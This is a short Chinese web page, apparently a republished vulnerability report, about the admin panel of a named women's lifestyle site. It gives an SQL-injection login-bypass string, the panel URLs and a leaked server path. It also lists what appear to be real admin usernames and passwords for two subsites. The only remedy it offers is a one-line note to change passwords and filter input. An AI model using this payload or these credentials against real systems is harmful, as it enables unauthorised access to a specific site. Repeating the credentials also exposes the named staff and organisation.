网站地图    收藏   

主页 > 后端 > 网站安全 >

瑞丽女性网分站后台验证绕过+SQL注入+路径泄漏

来源:自学PHP网    时间:2015-04-17 14:11 作者: 阅读:

[导读] 瑞丽女性网分站后台弱口令+SQL注入,不是废弃的用#39;or#39;#39;=#39;#39;or#39;#39;=#39;尝试登录后帐号密码自己就跳出来了http://lifestyle.rayli.com.cn/manager/index.php-/data/www/wwwroot/lifes......


瑞丽女性网分站后台弱口令+SQL注入,不是废弃的

用'or''=''or''='尝试登录后帐号密码自己就跳出来了
http://lifestyle.rayli.com.cn/manager/index.php->/data/www/wwwroot/lifestyle/

http://lifestyle.rayli.com.cn/manager/login.php

admin admin www.2cto.com
liulongjun liulongjun@rayli
zengyujie zengyujie@rayli
 
http://video.rayli.com.cn/ec/

admin admin
漏洞证明:
 
 
修复方案:

改密码,过滤参数...


作者 zhk

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论